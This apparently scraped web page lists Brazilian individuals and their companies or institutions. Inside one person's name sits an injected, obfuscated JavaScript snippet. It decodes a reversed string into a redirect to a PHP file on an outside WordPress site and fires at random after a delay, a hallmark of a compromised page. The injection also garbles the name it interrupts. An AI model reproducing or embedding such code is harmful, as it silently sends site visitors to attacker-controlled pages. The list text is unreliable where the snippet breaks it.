Rodrigo Calheiros Dória iAi Technologies – Unidadade de negócios em fase de estruturação como empresa no C.E.S.A.R.
Scylla Cabral da Costa Neto Jynx Playware Ltda
Silvio Meira C.E.S.A.R – Centro de Estudose Sistemas Avançados do Recife
Maria da Paz Carvalho da Silva COOPHENE
Valdemir Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andre dos Santos Indústria de Gessos Especiais Ltda
Wagner de Melo Pereira Vinícola do Vale do São Francisco S/A
Ysôlda Maia de Albuquerque NEODIÁLISE
Yves Cristiano Lima Nogueira Everest Brasil Ltda